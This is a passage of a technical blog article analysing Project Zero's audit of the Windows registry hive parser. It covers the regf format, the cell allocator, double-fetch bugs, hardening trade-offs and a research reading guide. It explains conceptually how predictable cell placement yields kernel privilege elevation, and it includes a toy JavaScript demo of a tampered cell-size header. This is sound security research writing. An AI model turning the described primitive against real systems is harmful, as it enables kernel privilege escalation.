&lt;td&gt;20&lt;/td&gt;
&lt;td&gt;50 CVEs across 39 reports [@pz1-registry-adventure-1]&lt;/td&gt;
&lt;td&gt;~2.5 CVEs per month&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;To understand why hive-based memory corruption works as a primitive, we have to look at what the parser actually is.&lt;/p&gt;
&lt;h2&gt;6. Anatomy of the Configuration Manager&lt;/h2&gt;
&lt;p&gt;If you want to find bugs in the registry, you have to know exactly what a hive is. Here is what one looks like on disk and in memory.&lt;/p&gt;
&lt;p&gt;A hive begins with a &lt;strong&gt;base block&lt;/strong&gt;: a 4 KiB header that contains the magic string &lt;code&gt;regf&lt;/code&gt;, the format version (v1.3 in modern hives), a sequence-number pair for crash recovery, a checksum, the root cell index, the hive length, the boot type and recovery information [@pz5-registry-adventure-5; @libregf-spec]. The validator that runs at hive load time vets this block first. If the checksum does not match, if the version is unrecognized, if the lengths do not add up, the parser refuses the file and no further code runs. This is the line of defense that ate 99% of the bitflipping fuzzer&apos;s effort in 2016 and again in 2022.&lt;/p&gt;
&lt;p&gt;After the base block come one or more &lt;strong&gt;HBIN&lt;/strong&gt; blocks. Each HBIN is a 4-KiB-multiple chunk of the hive carved into cells. Microsoft&apos;s documentation on registry hives describes the on-disk supporting files alongside the main hive: an &lt;code&gt;.alt&lt;/code&gt; backup of the critical &lt;code&gt;HKLM\System&lt;/code&gt; hive, a &lt;code&gt;.log&lt;/code&gt; transaction log, and a &lt;code&gt;.sav&lt;/code&gt; backup [@ms-registry-hives]. The HBIN is the layer the cells live in.&lt;/p&gt;
&lt;p&gt;A &lt;strong&gt;cell&lt;/strong&gt; is a length-prefixed chunk of bytes whose first 32-bit field is a signed integer. Positive means free, negative means allocated, and the absolute value is the cell size in bytes (cells are 8-byte aligned). The Suhanov spec documents the convention plainly, alongside the cell types we are about to walk through [@msuhanov-spec]. The signed-size convention is not just a curiosity; it is the load-bearing invariant that the cell allocator must protect, and it is the convention an attacker exploits when they convince the kernel to walk one allocated cell into the next.&lt;/p&gt;
&lt;p&gt;{`
// Demonstrates the regf signed-size cell convention from Suhanov&apos;s spec.
// A cell whose first 32-bit field is positive is FREE.
// A cell whose first 32-bit field is negative is ALLOCATED; |size| is bytes.&lt;/p&gt;
&lt;p&gt;function readCellHeader(buf, offset) {
  const raw = new DataView(buf).getInt32(offset, true); // little-endian
  const allocated = raw &amp;lt; 0;
  const sizeBytes = Math.abs(raw);
  return { allocated, sizeBytes, raw };
}&lt;/p&gt;
&lt;p&gt;// Build a 16-byte buffer: cell #1 allocated, 16 bytes, then a sentinel.
const buf = new ArrayBuffer(20);
new DataView(buf).setInt32(0, -16, true); // header: -16 -&amp;gt; allocated, 16 B
new DataView(buf).setInt32(16, 1234, true); // sentinel &quot;next cell&quot; prefix&lt;/p&gt;
&lt;p&gt;console.log(&quot;Cell 1:&quot;, readCellHeader(buf, 0));
console.log(&quot;Cell 2 sentinel:&quot;, readCellHeader(buf, 16));&lt;/p&gt;
&lt;p&gt;// A trivial validator that only checks &quot;is the size positive after abs()&quot;
// will accept a maliciously flipped header that overlaps into the next cell.
const tampered = buf.slice();
new DataView(tampered).setInt32(0, -24, true); // size now spans into cell 2
console.log(&quot;Tampered cell 1:&quot;, readCellHeader(tampered, 0));
`}&lt;/p&gt;
&lt;p&gt;A hive holds a small number of cell types. The five that matter for security analysis are catalogued below. Each describes a different on-disk concept, and each can be malformed in ways the parser must catch.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Cell type&lt;/th&gt;
&lt;th&gt;Signature&lt;/th&gt;
&lt;th&gt;What it stores&lt;/th&gt;
&lt;th&gt;Failure mode&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Key node&lt;/td&gt;
&lt;td&gt;&lt;code&gt;nk&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;A registry key: name, parent index, child-list index, value-list index, security index, timestamp [@libregf-spec]&lt;/td&gt;
&lt;td&gt;Dangling indices; malformed name length; recursive parenting&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Value&lt;/td&gt;
&lt;td&gt;&lt;code&gt;vk&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;A registry value: name, type tag, length, inline data or data-block index [@libregf-spec]&lt;/td&gt;
&lt;td&gt;Length-versus-buffer mismatch; type-tag confusion&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Security descriptor&lt;/td&gt;
&lt;td&gt;&lt;code&gt;sk&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;A security descriptor for one or more keys; reference-counted [@libregf-spec]&lt;/td&gt;
&lt;td&gt;Refcount underflow on shared SDs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Index node&lt;/td&gt;
&lt;td&gt;&lt;code&gt;lf&lt;/code&gt; / &lt;code&gt;lh&lt;/code&gt; / &lt;code&gt;li&lt;/code&gt; / &lt;code&gt;ri&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;A subkey list: leaves with hash hints, intermediate ri lists [@msuhanov-spec]&lt;/td&gt;
&lt;td&gt;Out-of-order entries; phantom subkeys&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Big-data block&lt;/td&gt;
&lt;td&gt;&lt;code&gt;db&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;A continuation cell for values larger than 16,344 bytes (just under 16 KiB) [@libregf-spec]&lt;/td&gt;
&lt;td&gt;Length math overflow; truncated continuation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Between the cells and the parser sits a layer most people do not know about: the &lt;strong&gt;cell map&lt;/strong&gt;. Bins are not guaranteed to be contiguously mapped in kernel virtual address space, so the Configuration Manager maintains a page-table-like indirection that translates a 32-bit cell index into a virtual address. PZ #6 documents this in detail in its discussion of &lt;code&gt;_HHIVE&lt;/code&gt; and &lt;code&gt;_CMHIVE&lt;/code&gt;, with the latter spanning 0x12F8 bytes and the former 0x600 bytes at offset zero [@pz6-registry-adventure-6].Per PZ #6: &lt;code&gt;_CMHIVE&lt;/code&gt; is 0x12F8 bytes and contains an embedded &lt;code&gt;_HHIVE&lt;/code&gt; of 0x600 bytes at offset 0. The depth of Jurczyk&apos;s reverse-engineering is reflected in these exact offsets, which are not in any Microsoft-published documentation.&lt;/p&gt;

A page-table-like indirection layer that translates a 32-bit cell index into a kernel virtual address [@pz6-registry-adventure-6]. The cell map exists because the bins making up a hive are not guaranteed to be contiguously mapped. Most cell-boundary exploitation primitives walk through the cell map.

flowchart LR
    A[&quot;32-bit cell index&quot;] --&amp;gt; B[&quot;Directory index&quot;]
    A --&amp;gt; C[&quot;Table index&quot;]
    A --&amp;gt; D[&quot;Cell offset within bin&quot;]
    B --&amp;gt; E[&quot;Cell map directory&quot;]
    E --&amp;gt; F[&quot;Cell map table&quot;]
    C --&amp;gt; F
    F --&amp;gt; G[&quot;Bin base address&quot;]
    D --&amp;gt; G
    G --&amp;gt; H[&quot;Kernel virtual address of cell&quot;]
&lt;p&gt;The cell allocator itself -- &lt;code&gt;HvAllocateCell&lt;/code&gt;, &lt;code&gt;HvReallocateCell&lt;/code&gt;, &lt;code&gt;HvFreeCell&lt;/code&gt; [@pz8-registry-adventure-8] -- is small, deterministic, and unrandomized. There is no allocator metadata integrity check; freed cells are eagerly reused; cell placement is a function of the bins&apos; free lists, which the attacker can influence by shaping the input hive. Combined with the cell map, the result is that the attacker can place a chosen byte pattern at a chosen cell index with reasonable predictability, and -- because the same allocator services both attacker-influenced and kernel-managed cells -- the attacker can place that pattern &lt;em&gt;adjacent&lt;/em&gt; to a kernel-managed object whose corruption hands them an elevation primitive [@pz8-registry-adventure-8].&lt;/p&gt;
&lt;p&gt;Since Windows 10 RS4, hive pages are not copied into the paged kernel pool; they are backed by &lt;strong&gt;memory-mapped sections&lt;/strong&gt; that can be paged in from the underlying file [@pz5-registry-adventure-5]. The performance and footprint benefits are real. The security side effect is a new bug class: the kernel can read a hive byte at validation time, then read the same byte again at use time, and the underlying page can have been re-fetched in between. This is the &lt;strong&gt;double-fetch&lt;/strong&gt; pattern, and CVE-2024-43452 -- a double-fetch while loading hives from remote network shares -- is the canonical example Jurczyk cites in PZ #5 [@pz5-registry-adventure-5].&lt;/p&gt;

A vulnerability pattern where the kernel reads the same attacker-influenced memory location twice and treats both reads as authoritative. The section-backed registry (Windows 10 RS4) made hive pages pageable, which enables this on hive files served from remote SMB shares: between the kernel&apos;s two reads, the attacker swaps the byte under the kernel&apos;s feet. CVE-2024-43452 is the canonical example [@pz5-registry-adventure-5].
&lt;p&gt;A small but stubborn misconception about the registry deserves a callout before we move on. The registry is not lock-free. The Configuration Manager uses &lt;strong&gt;pushlocks&lt;/strong&gt; -- a Windows kernel synchronization primitive supporting shared and exclusive modes -- on a per-Key-Control-Block basis, plus a hive-wide pushlock for operations that touch the hive globally [@pz6-registry-adventure-6]. PZ #6&apos;s discussion of &lt;code&gt;_CMHIVE&lt;/code&gt; and &lt;code&gt;_HHIVE&lt;/code&gt; documents the pushlock placements directly. The design is fine-grained pushlock synchronization, not lock-free concurrency, and the difference matters because temporal hive-memory-corruption bugs frequently exploit the &lt;em&gt;gap between unlocking a parent and re-locking it&lt;/em&gt;, which exists in pushlock designs and would not exist in a true lock-free one.&lt;/p&gt;

A Windows kernel synchronization primitive supporting shared and exclusive modes [@pz6-registry-adventure-6]. The registry uses per-KCB pushlocks and a hive-wide pushlock. The implementation is *not* lock-free; that is a third-party misconception, and several of Jurczyk&apos;s temporal hive-memory-corruption bugs exploit the moment a pushlock is released and re-acquired.
&lt;p&gt;Two other runtime subsystems sit on top of the parser. The Kernel Transaction Manager (KTM) lets registry writes be grouped into atomic, rollbackable transactions; KTM rides on the Common Log File System (CLFS).KTM&apos;s CLFS backing is interesting in its own right: CLFS has had its own significant CVE history, and a transactional registry write whose KTM log can be tampered with reaches a separate kernel subsystem with its own attack surface. The transactional layer is one of the &quot;semantic combinators&quot; Jurczyk explicitly lists as outside the syntactic-fuzzer reach.&lt;/p&gt;
&lt;p&gt;Incremental write-ahead logging via LOG1 and LOG2 provides crash-recoverable durability for individual writes that have not yet been flushed to the main hive [@pz5-registry-adventure-5]. Both layers add features. Both layers add cell-lifetime states the parser must reason about. Both layers contributed bugs to the audit.&lt;/p&gt;
&lt;p&gt;The PZ #1 summary breakdown of the 50-CVE cohort is the clearest single statistic in the entire series.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Category&lt;/th&gt;
&lt;th&gt;Count&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Elevation of privilege&lt;/td&gt;
&lt;td&gt;39 [@pz1-registry-adventure-1]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Information disclosure&lt;/td&gt;
&lt;td&gt;9 [@pz1-registry-adventure-1]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Memory information disclosure&lt;/td&gt;
&lt;td&gt;1 [@pz1-registry-adventure-1]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Denial of service&lt;/td&gt;
&lt;td&gt;1 [@pz1-registry-adventure-1]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Total&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;50&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Of those 50, the subset PZ #8 picks out as exploitable via the hive-memory-corruption primitive numbers seventeen: CVE-2022-34707, CVE-2022-34708, CVE-2022-37956, CVE-2022-37988, CVE-2022-38037, CVE-2023-21675, CVE-2023-21748, CVE-2023-23420, CVE-2023-23421, CVE-2023-23422, CVE-2023-23423, CVE-2023-28248, CVE-2023-35382, CVE-2023-38139, CVE-2024-26182, CVE-2024-43641, and CVE-2024-49114 [@pz8-registry-adventure-8]. Seventeen kernel LPEs from one researcher, one subsystem, one bug class, one exploitation primitive.&lt;/p&gt;
&lt;p&gt;Microsoft has known about every one of these issues since the day they were reported. Why has the parser not been rewritten?&lt;/p&gt;
&lt;h2&gt;7. Why Doesn&apos;t Microsoft Just Rewrite It?&lt;/h2&gt;
&lt;p&gt;The first thing anyone asks after seeing the architecture is the obvious question. Why doesn&apos;t Microsoft rewrite this thing? The answer is, roughly, &quot;because they cannot.&quot;&lt;/p&gt;
&lt;p&gt;Backward compatibility is the dominant constraint. A hive file from NT 4.0 in 1996 still mounts on Windows 11 in 2026; that is the published behaviour of &lt;code&gt;REG_STANDARD_FORMAT&lt;/code&gt; in &lt;code&gt;RegSaveKeyExA&lt;/code&gt; [@ms-regsavekeyex]. Three decades of system images, third-party installers, forensic tooling, configuration-management products, and group-policy templates depend on the regf v1.3 format being readable. A new on-disk format with a hardened in-memory representation would not be a parser change; it would be the kind of compatibility break Microsoft has not made since the move from Win9x to NT.&lt;/p&gt;
&lt;p&gt;There are databases inside Windows that look like reasonable alternatives at a glance. None of them is a drop-in replacement, for reasons that have less to do with their internals than with what the registry is asked to do.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;System&lt;/th&gt;
&lt;th&gt;Implementation&lt;/th&gt;
&lt;th&gt;Used for&lt;/th&gt;
&lt;th&gt;Why it is not a drop-in&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Registry&lt;/td&gt;
&lt;td&gt;regf, kernel parser&lt;/td&gt;
&lt;td&gt;All Windows configuration, COM, security, policy [@ms-structure-registry]&lt;/td&gt;
&lt;td&gt;The thing we are auditing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;ESE&lt;/td&gt;
&lt;td&gt;&lt;code&gt;esent.dll&lt;/code&gt;, full ACID DB&lt;/td&gt;
&lt;td&gt;Active Directory, Windows Search, Mail, Exchange [@winint7-part2]&lt;/td&gt;
&lt;td&gt;Different access model; userland; not designed for boot-path config&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;LSA Secrets / &lt;code&gt;SECURITY&lt;/code&gt; hive&lt;/td&gt;
&lt;td&gt;regf substrate, restricted access&lt;/td&gt;
&lt;td&gt;Cached credentials, Kerberos keys [@winint7-part2]&lt;/td&gt;
&lt;td&gt;Same parser, same bug class -- moving the lock does not move the bug&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;a href=&quot;https://paragmali.com/blog/the-object-manager-namespace/&quot; rel=&quot;noopener&quot;&gt;Object Manager Namespace&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;Kernel object directory&lt;/td&gt;
&lt;td&gt;Named kernel objects (events, mutexes, sections)&lt;/td&gt;
&lt;td&gt;Different threat model; not a config store&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MSIX / AppX state&lt;/td&gt;
&lt;td&gt;Per-package JSON/XML in app container&lt;/td&gt;
&lt;td&gt;UWP/Store-app configuration&lt;/td&gt;
&lt;td&gt;New apps only; cannot host legacy registry consumers&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;ESE&lt;/strong&gt; -- the Extensible Storage Engine -- is the closest existing internal candidate. It is a full ACID embedded database, used by Active Directory and Windows Search, and it is much better-engineered as a storage layer than regf is. It is also userland, designed for very different consumers, and not on the kernel boot path. Reusing it would require porting every kernel-mode registry caller across the kernel-user boundary, which has performance implications that nobody has signed off on publicly.&lt;/p&gt;

Microsoft&apos;s Extensible Storage Engine, an embedded ACID database implemented in `esent.dll`. Active Directory, Windows Search, Exchange, and Windows Mail all use it as their internal data store [@winint7-part2]. It is a much more modern design than the registry&apos;s regf, but it is userland, not boot-path, and its access model is different enough that it is not a drop-in replacement for the kernel-mode configuration store.
&lt;p&gt;The &lt;strong&gt;LSA Secrets&lt;/strong&gt; and &lt;code&gt;SECURITY&lt;/code&gt; hive are even more instructive. They are regf-format hives with stricter access controls. They inherit the entire hive-memory-corruption bug class verbatim; restricting &lt;em&gt;who&lt;/em&gt; can talk to the parser does not change &lt;em&gt;what&lt;/em&gt; the parser does with the bytes it receives.&lt;/p&gt;

The Windows kernel has another old, hierarchical, semantically-rich subsystem that has not been audited at this scale: the Object Manager Namespace, which exposes named kernel objects (events, sections, mutexes, devices, symbolic links) through a path-like API. It is the same era as the registry, the same kind of in-kernel data structure with a path-resolution layer, the same authorization model that has been hardened incrementally over thirty years. James Forshaw&apos;s work has touched it in places; no one has yet read it the way Jurczyk read the Configuration Manager. The Object Manager Namespace is the most plausible next target for a Jurczyk-style audit by anyone who wants to repeat the result on a different subsystem.
&lt;p&gt;The structural argument is the one to remember. The registry&apos;s on-disk format and its in-memory format are the same format, and its recovery semantics depend on deterministic cell placement; the attack surface and the recovery semantics are therefore literally the same code [@pz5-registry-adventure-5; @pz8-registry-adventure-8]. You cannot harden one without weakening the other unless you give up the hybrid-format premise entirely -- in which case, you are not hardening the parser; you are rewriting it. And rewriting it is what backward compatibility forbids.&lt;/p&gt;
&lt;p&gt;If a wholesale redesign is off the table, can the existing parser be hardened in place?&lt;/p&gt;
&lt;h2&gt;8. The Theoretical Limits of In-Place Hardening&lt;/h2&gt;
&lt;p&gt;If Microsoft cannot rewrite the parser, can they at least harden it? Four levers are theoretically available. Each one trades against a different property the existing design depends on.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Lever&lt;/th&gt;
&lt;th&gt;What it would achieve&lt;/th&gt;
&lt;th&gt;Backward-compat cost&lt;/th&gt;
&lt;th&gt;Effectiveness against hive-memory-corruption&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Allocator randomization&lt;/td&gt;
&lt;td&gt;Break the placement predictability the exploitation primitive relies on&lt;/td&gt;
&lt;td&gt;Breaks log-replay recovery semantics that depend on deterministic cell placement [@pz8-registry-adventure-8]&lt;/td&gt;
&lt;td&gt;High in principle; incompatible in practice&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cell-metadata integrity checks&lt;/td&gt;
&lt;td&gt;Catch naive corruption at allocator boundaries&lt;/td&gt;
&lt;td&gt;Modest format change for in-memory layout; on-disk format unaffected&lt;/td&gt;
&lt;td&gt;Low; catches accidental corruption, not crafted-input semantic violations&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Structured deserialization at load time&lt;/td&gt;
&lt;td&gt;Validate the entire hive into a separate in-memory structure&lt;/td&gt;
&lt;td&gt;Abandons the hybrid-format premise; effectively rewrites the parser&lt;/td&gt;
&lt;td&gt;High but indistinguishable from rewriting&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Move the parser to user mode&lt;/td&gt;
&lt;td&gt;Reduce blast radius of a parser bug to one process&lt;/td&gt;
&lt;td&gt;Performance and correctness implications for boot-path config&lt;/td&gt;
&lt;td&gt;Mitigation only; the bug class survives in userland&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;&lt;strong&gt;Allocator randomization&lt;/strong&gt; is the obvious idea. ASLR-like randomization of cell placement would defeat the &quot;place attacker-controlled bytes at predictable index&quot; half of the primitive, but it would also break recovery semantics: log replay assumes that after a crash, the cells in the recovered hive end up at the same indices the log expected, because the on-disk-equals-in-memory format encodes the cell index in the hive itself. PZ #8&apos;s framing of the allocator&apos;s lack of randomness as a &lt;em&gt;design property&lt;/em&gt; rather than an oversight is precisely about this trade-off [@pz8-registry-adventure-8].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cell-metadata integrity checks&lt;/strong&gt; are cheap to add and have an obvious limit. The cell allocator currently has no metadata integrity at all; adding a checksum or a canary would catch a corrupted size header, a stale free-list pointer, or a write that accidentally overran a cell boundary. It would not catch an attacker who shapes a &lt;em&gt;legal&lt;/em&gt; hive that exercises the parser&apos;s combinatorial logic. The semantic bugs Jurczyk hunted do not write garbage cells; they trick the parser into reusing valid cells for purposes the parser does not realize it is being asked to.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Structured deserialization at hive-load time&lt;/strong&gt; is the option computer-science textbooks recommend. Validate the entire input file against a formal grammar, deserialize into a separate in-memory representation that is unrelated to the on-disk byte layout, and let the kernel operate on that. This is what the LangSec discipline calls for, and what structure-aware fuzzing surveys treat as the right shape for parser hardening [@manes-fuzz-survey]. It is also identical to &quot;rewrite the parser.&quot; The hybrid-format premise that has been load-bearing since 1993 has to die for this option to exist.&lt;/p&gt;

Language-theoretic security: a discipline that treats parsers as recognizers for a formal grammar, rejecting inputs outside the grammar instead of recovering from malformed input. The registry parser does the opposite by design: it accepts inputs that the recognizer would call &quot;marginal&quot; (a slightly-malformed log, an off-by-one bin) because recovery from a torn write requires acceptance, not rejection.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; LangSec&apos;s central recommendation is that a parser should be a &lt;em&gt;recognizer&lt;/em&gt; for a formal language: an input either belongs to the language or it is rejected outright, with no recovery and no partial acceptance. The registry&apos;s regf parser is not a recognizer in this sense, and cannot be retrofitted into one without abandoning the hybrid on-disk-and-in-memory premise.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Moving the parser to user mode&lt;/strong&gt; -- running the parser inside an isolated process and exposing only sanitized handles to kernel callers -- is what the academic literature recommends for other kernel parsers. There is no public Microsoft work on doing this for the registry specifically, and the performance cost of a kernel/user boundary on the boot-path configuration store is, charitably, &quot;unstudied.&quot; The bug class would still exist; the blast radius would shrink.&lt;/p&gt;

Static analysis cannot save us in general. Rice&apos;s theorem says, informally, that any non-trivial semantic property of an arbitrary program is undecidable: there is no algorithm that takes a program and tells you whether it has property $P$, for any interesting $P$. Memory safety is interesting. Therefore, any static-analysis approach to &quot;find every memory-safety bug in the Configuration Manager&quot; must be either unsound (it misses bugs) or incomplete (it flags false positives), and in practice usually both. Formal verification of a *specific* parser against a *specific* specification can sidestep this -- the EverParse project at `github.com/project-everest/everparse` does exactly that for TLS and QUIC message parsers in Microsoft research -- but it requires a formal specification of the input language, and the regf format has none.
&lt;p&gt;The honest answer is the one Jurczyk gives in PZ #7 and PZ #8: the parser can be incrementally hardened, and is being, in response to each individual CVE [@pz7-registry-adventure-7; @pz8-registry-adventure-8]. The deeper design choices that make the parser exploitable are the same choices that make it work at all. We have a thirty-year-old parser that cannot be redesigned, cannot easily be replaced, and can only be hardened in ways that trade safety for compatibility. So what does that tell us about the rest of the Windows kernel?&lt;/p&gt;
&lt;h2&gt;9. Open Problems and What the Audit Implies&lt;/h2&gt;
&lt;p&gt;Jurczyk read one Windows kernel subsystem for twenty months and produced fifty CVEs. Windows has dozens of kernel subsystems. None of them has been read this way.&lt;/p&gt;
&lt;p&gt;That sentence is the article. The rest of this section is bookkeeping.&lt;/p&gt;
&lt;p&gt;First, the open business inside the audit itself. Microsoft chose not to fix some of Jurczyk&apos;s low-severity reports; PZ tracker issue #2508 is the canonical example of a WontFix close, and the broader &quot;low severity in isolation&quot; category is not &quot;not exploitable in combination&quot; -- modern kernel exploitation is bug-chaining, and a benign-looking primitive plus a benign-looking infoleak often compose into something less benign [@pz7-registry-adventure-7]. PZ #1 also explicitly flags higher-level wrapper logic (path translation in &lt;code&gt;CmpDoOpen&lt;/code&gt;, predefined-key abuses, virtualization layers) as parts of the surface that the 20-month audit did not exhaust [@pz1-registry-adventure-1]. There are more registry bugs to find.&lt;/p&gt;
&lt;p&gt;Second, the cross-subsystem implication. Microsoft&apos;s Windows Insider Preview bounty program pays &quot;from $500 to $100,000 USD&quot; for qualifying critical kernel bugs [@msrc-bounty-windows-insider]. The 50-CVE cohort, valued at the upper bound of the Insider Preview range, is somewhere in the neighbourhood of $5M in latent bounty value, all produced by one person reading code.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; At Microsoft&apos;s published $100,000 ceiling for critical Windows kernel bugs under the Windows Insider Preview program [@msrc-bounty-windows-insider], the 50-CVE cohort represents roughly $5M in latent bounty value. That is one person, twenty months, one subsystem. The question is not how to fix the registry; it is how many other subsystems would yield similar numbers under similar treatment.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What does that imply for the Object Manager Namespace, the I/O Manager, the print stack, the transactional file system, the Common Log File System, or the WinUSB stack? No public audit of any of those subsystems at the depth of Jurczyk&apos;s registry work exists. Some of them have had targeted fuzzing campaigns; none has had a 100,000-line code review by a single expert reader. The expected yield is, charitably, unknown.&lt;/p&gt;

flowchart TD
    A[&quot;Windows kernel subsystems&quot;] --&amp;gt; B[&quot;Registry / Configuration Manager&quot;]
    A --&amp;gt; C[&quot;Object Manager Namespace&quot;]
    A --&amp;gt; D[&quot;I/O Manager&quot;]
    A --&amp;gt; E[&quot;KTM and CLFS&quot;]
    A --&amp;gt; F[&quot;Print spooler stack&quot;]
    A --&amp;gt; G[&quot;Transactional NTFS&quot;]
    A --&amp;gt; H[&quot;GDI and Win32k&quot;]
    B --&amp;gt; B1[&quot;Jurczyk 2022-2023, 50 CVEs&quot;]
    C --&amp;gt; C1[&quot;Partial Forshaw 2014+, logic bugs&quot;]
    D --&amp;gt; D1[&quot;Episodic fuzzing, no public deep audit&quot;]
    E --&amp;gt; E1[&quot;Episodic CLFS exploitation, no full audit&quot;]
    F --&amp;gt; F1[&quot;PrintNightmare-era patches, no full audit&quot;]
    G --&amp;gt; G1[&quot;No public deep audit&quot;]
    H --&amp;gt; H1[&quot;Years of TYPESAFE_CAST + targeted fuzzing&quot;]
&lt;p&gt;Third, Microsoft&apos;s own internal posture. The MSRC SDL pipeline includes OneFuzz-lineage tooling internally, though the public OneFuzz repository was archived in September 2023 [@onefuzz-repo]. No public Microsoft statement confirms or denies whether the registry was systematically fuzzed or audited inside Microsoft before Jurczyk&apos;s 2022 audit. The absence of such a statement is itself information: if Microsoft had a parallel internal effort that found these bugs first, they would normally publish that.&lt;/p&gt;
&lt;p&gt;Fourth, the methodological question that the article cannot answer because nobody has the data. Does manual code audit scale? One researcher, twenty months, one subsystem, fifty CVEs. Two researchers do not produce twice the bugs because of overlap and coordination cost; the typical second-researcher contribution on the same target is sublinear. There is no obvious path to ten Jurczyks reading ten subsystems in parallel and producing five hundred CVEs.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The registry is not interesting because it had bugs. The registry is interesting because someone read it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Jurczyk did not break new ground by finding a bug. He broke new ground by reading the code -- and the implication for everything else nobody has read is left, as Jurczyk himself might say, as an exercise for the reader.&lt;/p&gt;
&lt;h2&gt;10. A Practical Guide&lt;/h2&gt;
&lt;p&gt;Up to here, this article has been about the research. The rest is for practitioners.&lt;/p&gt;
&lt;h3&gt;For vulnerability researchers&lt;/h3&gt;
&lt;p&gt;If you want to understand Jurczyk&apos;s audit at the level required to repeat it, the Project Zero series is the primary text and the reading order is not the publication order. PZ #4 (hives and the registry layout) and PZ #5 (the regf file format) are the canonical references for the &lt;em&gt;substrate&lt;/em&gt;; PZ #6 (kernel-mode objects) is the reverse-engineering of the in-memory structures; PZ #7 (attack surface analysis) is the bug-class taxonomy; PZ #8 (practical exploitation) is the exploitation primitive on Windows 11 with modern mitigations [@pz4-registry-adventure-4; @pz5-registry-adventure-5; @pz6-registry-adventure-6; @pz7-registry-adventure-7; @pz8-registry-adventure-8]. PZ #1 and #2 are the framing and the history; PZ #3 is the bibliography. Read 4 -- 5 -- 6 -- 7 -- 8, in that order, with PZ #1 alongside as a CVE-index lookup.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Audience&lt;/th&gt;
&lt;th&gt;Where to start&lt;/th&gt;
&lt;th&gt;Why&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Researcher learning the surface&lt;/td&gt;
&lt;td&gt;PZ #4 then PZ #5 [@pz4-registry-adventure-4; @pz5-registry-adventure-5]&lt;/td&gt;
&lt;td&gt;Substrate first; specifics later&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Defender / SOC engineer&lt;/td&gt;
&lt;td&gt;PZ #7 attack-surface taxonomy [@pz7-registry-adventure-7]&lt;/td&gt;
&lt;td&gt;Detection patterns map to bug classes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Kernel engineer (defensive)&lt;/td&gt;
&lt;td&gt;PZ #4--6 collectively&lt;/td&gt;
&lt;td&gt;Best non-Microsoft technical reference on the Configuration Manager&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Patch manager&lt;/td&gt;
&lt;td&gt;PZ #8&apos;s 17-CVE list + PZ #1 full table [@pz8-registry-adventure-8; @pz1-registry-adventure-1]&lt;/td&gt;
&lt;td&gt;Prioritize the hive-memory-corruption cohort&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

